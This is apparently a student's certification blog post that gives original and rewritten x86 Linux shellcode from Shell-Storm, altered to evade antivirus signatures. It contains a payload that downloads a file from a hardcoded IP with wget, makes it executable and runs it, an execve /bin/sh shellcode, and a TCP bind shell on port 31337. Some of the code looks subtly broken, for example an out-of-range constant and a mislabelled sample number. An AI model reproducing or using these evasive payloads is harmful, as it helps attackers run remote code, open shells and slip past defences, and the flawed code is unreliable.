Assignment #6: Create 3 polymorphic versions of shellcodes from Shell-Storm

In this assignment, the objective was to create three polymorphic versions of the following shellcode samples:

• https://web.archive.org/web/20191002184848/http://shell-storm.org/shellcode/files/shellcode-862.php
• https://web.archive.org/web/20190305152644/http://shell-storm.org/shellcode/files/shellcode-811.php
• https://web.archive.org/web/20190618054900/http://shell-storm.org/shellcode/files/shellcode-849.php

The purpose of this objective is to leverage alternate instructions which essentially does the same thing in order to beat AV Signatures, for example:

• xor    eax,eax
• lea     ebx,[0]
• loop   $
• mov   edx,0
• and    esi,0
• sub    edi,edi
• push  0
• pop    ebp

The first sample, shellcode-862 downloads a file from a hardcoded ip address using wget and then changes the downloaded file permissions to executable.

The output shown below shows the original version and the polymorphic version.

Original Version

Polymorphic Version

global _start section .text _start: ;fork xor eax,eax mov al,0x2 int 0x80 xor ebx,ebx cmp eax,ebx jz child ;wait(NULL) xor eax,eax mov al,0x7 int 0x80 ;chmod x xor ecx,ecx xor eax, eax push eax mov al, 0xf push 0x78 mov ebx, esp xor ecx, ecx mov cx, 0x1ff int 0x80 ;exec x xor eax, eax push eax push 0x78 mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 child: ;download 192.168.2.222//x with wget push 0xb pop eax cdq push edx push 0x782f2f32 ;2//x avoid null byte push 0x32322e32 ;22.2 push 0x2e383631 ;.861 push 0x2e323931 ;.291 mov ecx,esp push edx push 0x74 ;t push 0x6567772f ;egw/ push 0x6e69622f ;nib/ push 0x7273752f ;rsu/ mov ebx,esp push edx push ecx push ebx mov ecx,esp int 0x80

global _start section .text _start: ;fork mul edx mov al,0x2 int 0x80 cmp eax, edx jz child ;wait(NULL) lea eax, [edx] mov al,0x7 int 0x80 ;chmod x lea ecx, [edx] mov dword [esp-0x4], ecx mov al, 0xf mov dword [esp-0x8], 0x78 mov al, 0xe add al, 0x1 mov ebx, esp mov cx, 0x1ff int 0x80 ;exec x mov dword ebx, [esp-0x12] mov dword ebx, [esp-0x8] push eax mov edx, esp push ebx mov ecx, esp mov al, 11 int 0x80 child: ;download 192.168.2.222//x with wget push 0xb pop eax cdq push edx push 0x782f2f32 ;2//x avoid null byte push 0x32322e32 ;22.2 push 0x2e383631 ;.861 push 0x2e323931 ;.291 mov ecx,esp push edx push 0x74 ;t push 0x6567772f ;egw/ push 0x6e69622f ;nib/ push 0x7273752f ;rsu/ mov ebx,esp push edx push ecx push ebx mov ecx,esp int 0x80

The next sample, shellcode-111was built to run execve("/bin/sh")
as shown earlier the output portrayed below includes the original and polymorphic versions:

Original Version	Polymorphic Version
global _start section .text _start: xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx mov %eax,%ecx mov %eax,%edx mov $0xb,%al int $0x80 xor %eax,%eax inc %eax int $0x80	global _start section .text _start: xor ecx, ecx mul ecx sub esp, 0xc mov dword[esp+0x8], ecx mov edx,0x57621e1e add edx,0x111111111 mov dword[esp+0x4], edx mov edx, ecx mov dword[esp],0x6e69622f mov ebx, esp mov al, 0xb int 0x80

The last sample, shellcode-849 is designed to create a tcp bind shell on port 31337 
and the output of its original form and its polymorphic version is highlighted below:

Original Version

Polymorphic Version

global _start section .text _start: xor eax,eax xor ebx,ebx xor ecx,ecx xor edx,edx mov al,0x66 mov bl,0x1 push ecx push 0x6 push 0x1 push 0x2 mov ecx,esp int 0x80 mov esi,eax mov al,0x66 xor ebx,ebx mov bl,0x2 push 0xa01a8c0 pushw 0x697a push bx inc bl mov ecx,esp push 0x10 push ecx push esi mov ecx,esp int 0x80 xor ecx,ecx mov cl,0x3 dupfd: dec cl mov al,0x3f int 0x80 jne 804809a xor eax,eax push edx push 0x68732f6e push 0x69622f2f mov ebx,esp push edx push ebx mov ecx,esp push edx mov edx,esp mov al,0xb int 0x80

global _start section .text _start: xor ecx, ecx mul ecx mov ebx, ecx push 0x66 pop eax push 0x1 pop ebx push edx push 0x6 push 0x1 push 0x2 mov ecx, esp int 0x80 xchg edi, eax push 0x66 pop eax inc ebx push edx mov ecx, 0x5869 add ecx, 0x1111 push ecx push bx mov ecx, esp push 0xa push ecx push edi mov ecx, esp int 0x80 push 0x66 pop eax inc ebx inc ebx push 0x1 push edi mov ecx, esp int 0x80 push 0x66 pop eax inc ebx push edx push edx push edi mov ecx, esp int 0x80 mov ebx, eax xor ecx, ecx push byte 0x2 pop ecx loop: mov al, 0x3f int 0x80 dec ecx jns loop mov eax, edx push edx push 0x68732f6e     push 0x69622f2f mov ebx,esp push edx push ebx mov ecx,esp push edx mov edx,esp mov al,0xb int 0x80

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-7730
All source files can be found on GitHub at https://github.com/br0ns0n/SLAE32